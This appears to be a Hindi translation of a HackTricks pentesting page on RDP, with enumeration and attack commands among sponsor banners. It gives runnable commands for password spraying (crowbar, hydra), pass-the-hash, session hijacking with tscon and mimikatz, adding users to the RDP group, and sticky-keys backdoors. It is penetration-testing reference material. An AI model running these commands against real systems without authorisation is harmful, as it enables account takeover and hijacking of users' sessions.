16 KiB
3389 - RDP पेंटेस्टिंग
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- क्या आप साइबरसिक्योरिटी कंपनी में काम करते हैं? क्या आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे? या क्या आप PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं? सब्सक्रिप्शन प्लान्स देखें!
- The PEASS Family की खोज करें, हमारा एक्सक्लूसिव NFTs का संग्रह
- आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
- 💬 Discord group में शामिल हों या telegram group में या Twitter पर मुझे फॉलो करें 🐦@carlospolopm.
- hacktricks repo में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें और hacktricks-cloud repo.
DragonJAR Security Conference एक अंतर्राष्ट्रीय साइबरसिक्योरिटी इवेंट है जो एक दशक से अधिक समय से चल रहा है और 7 और 8 सितंबर 2023 को बोगोटा, कोलंबिया में आयोजित किया जाएगा। यह एक उच्च तकनीकी सामग्री वाला इवेंट है जहाँ स्पेनिश में नवीनतम अनुसंधान प्रस्तुत किए जाते हैं जो दुनिया भर के हैकर्स और शोधकर्ताओं को आकर्षित करता है।
अभी निम्नलिखित लिंक पर रजिस्टर करें और इस महान सम्मेलन को मिस न करें!:
{% embed url="https://www.dragonjarcon.org/" %}
मूल जानकारी
Remote Desktop Protocol (RDP) एक प्रोप्राइटरी प्रोटोकॉल है जिसे Microsoft द्वारा विकसित किया गया है, जो एक उपयोगकर्ता को नेटवर्क कनेक्शन के माध्यम से दूसरे कंप्यूटर से ग्राफिकल इंटरफेस कनेक्ट करने की सुविधा प्रदान करता है। इस उद्देश्य के लिए उपयोगकर्ता RDP क्लाइंट सॉफ्टवेयर का उपयोग करता है, जबकि दूसरे कंप्यूटर को RDP सर्वर सॉफ्टवेयर चलाना चाहिए (यहाँ से here)।
डिफ़ॉल्ट पोर्ट: 3389
PORT STATE SERVICE
3389/tcp open ms-wbt-server
सूचीकरण
स्वचालित
{% code overflow="wrap" %}
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
{% endcode %}
यह उपलब्ध एन्क्रिप्शन और DoS संवेदनशीलता की जांच करता है (बिना सेवा को DoS का कारण बनाए) और NTLM Windows जानकारी (संस्करणों) प्राप्त करता है।
ब्रूट फोर्स
सावधान रहें, आप खातों को लॉक कर सकते हैं
पासवर्ड स्प्रेइंग
सावधान रहें, आप खातों को लॉक कर सकते हैं
# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
ज्ञात क्रेडेंशियल्स/हैश के साथ कनेक्ट करें
rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash
RDP सेवाओं के खिलाफ ज्ञात क्रेडेंशियल्स की जांच करें
impacket से rdp_check.py आपको यह जांचने देता है कि कुछ क्रेडेंशियल्स RDP सेवा के लिए मान्य हैं या नहीं:
rdp_check <domain>/<name>:<password>@<IP>
हमले
सेशन चोरी
SYSTEM अनुमतियों के साथ आप किसी भी उपयोगकर्ता द्वारा खोले गए RDP सेशन तक पहुँच सकते हैं, बिना मालिक का पासवर्ड जाने।
खुले सेशन प्राप्त करें:
query user
चयनित सत्र तक पहुँच
tscon <ID> /dest:<SESSIONNAME>
अब आप चयनित RDP सत्र के अंदर होंगे और आपको केवल Windows उपकरणों और सुविधाओं का उपयोग करके एक उपयोगकर्ता की नकल करनी होगी।
महत्वपूर्ण: जब आप एक सक्रिय RDP सत्रों तक पहुँचते हैं, तो आप उस उपयोगकर्ता को बाहर कर देंगे जो इसका उपयोग कर रहा था।
आप प्रक्रिया को डंप करके पासवर्ड प्राप्त कर सकते हैं, लेकिन यह विधि बहुत तेज है और आपको उपयोगकर्ता के वर्चुअल डेस्कटॉप्स के साथ इंटरैक्ट करने देती है (पासवर्ड नोटपैड में बिना डिस्क में सेव किए, अन्य मशीनों में खुले अन्य RDP सत्र...)
Mimikatz
आप यह करने के लिए mimikatz का भी उपयोग कर सकते हैं:
ts::sessions #Get sessions
ts::remote /id:2 #Connect to the session
स्टिकी-कीज़ और यूटिलमैन
इस तकनीक को स्टिकीकीज़ या यूटिलमैन के साथ मिलाकर आप किसी भी RDP सत्र में कभी भी प्रशासनिक CMD तक पहुँच सकते हैं।
आप उन RDPs की खोज कर सकते हैं जिन्हें पहले से इन तकनीकों के साथ बैकडोर किया गया है: https://github.com/linuz/Sticky-Keys-Slayer
RDP प्रोसेस इंजेक्शन
यदि कोई अलग डोमेन से या बेहतर विशेषाधिकारों के साथ RDP के माध्यम से लॉगिन करता है जहाँ आप एडमिन हैं, तो आप उसके RDP सत्र प्रोसेस में अपना बीकन इंजेक्ट कर सकते हैं और उसके रूप में कार्य कर सकते हैं:
{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %} rdp-sessions-abuse.md {% endcontent-ref %}
RDP समूह में उपयोगकर्ता जोड़ना
net localgroup "Remote Desktop Users" UserLoginName /add
स्वचालित उपकरण
AutoRDPwn एक पोस्ट-एक्सप्लॉइटेशन फ्रेमवर्क है जो Powershell में बनाया गया है, जिसे मुख्य रूप से Microsoft Windows कंप्यूटरों पर Shadow हमले को स्वचालित करने के लिए डिज़ाइन किया गया है। यह कमजोरी (जिसे Microsoft द्वारा एक फीचर के रूप में सूचीबद्ध किया गया है) एक दूरस्थ हमलावर को उसके पीड़ित की डेस्कटॉप को उसकी सहमति के बिना देखने की अनुमति देती है, और यहां तक कि मांग पर इसे नियंत्रित भी कर सकती है, ऑपरेटिंग सिस्टम के स्वयं के उपकरणों का उपयोग करके।
- EvilRDP
- कमांड लाइन से स्वचालित रूप से माउस और कीबोर्ड को नियंत्रित करें
- कमांड लाइन से स्वचालित रूप से क्लिपबोर्ड को नियंत्रित करें
- क्लाइंट से एक SOCKS प्रॉक्सी बनाएं जो RDP के माध्यम से लक्ष्य तक नेटवर्क संचार को चैनल करता है
- फाइलें अपलोड करने के बिना लक्ष्य पर मनमाने SHELL और PowerShell कमांड को निष्पादित करें
- लक्ष्य पर फाइल ट्रांसफर अक्षम होने पर भी लक्ष्य से फाइलें अपलोड और डाउनलोड करें
HackTricks स्वचालित कमांड्स
Protocol_Name: RDP #Protocol Abbreviation if there is one.
Port_Number: 3389 #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software
https://book.hacktricks.xyz/pentesting/pentesting-rdp
Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
<figure><img src="../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>
[**DragonJAR Security Conference एक अंतर्राष्ट्रीय साइबर सुरक्षा इवेंट है**](https://www.dragonjarcon.org/) जो एक दशक से अधिक समय से आयोजित हो रहा है और यह 7 और 8 सितंबर 2023 को बोगोटा, कोलंबिया में होगा। यह एक उच्च तकनीकी सामग्री वाला इवेंट है जहां स्पेनिश में नवीनतम अनुसंधान प्रस्तुत किए जाते हैं जो दुनिया भर के हैकर्स और शोधकर्ताओं को आकर्षित करता है।\
अभी निम्नलिखित लिंक पर रजिस्टर करें और इस महान सम्मेलन को मिस न करें!:
{% embed url="https://www.dragonjarcon.org/" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप PEASS के **नवीनतम संस्करण तक पहुंच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PRs सबमिट करके.**
</details>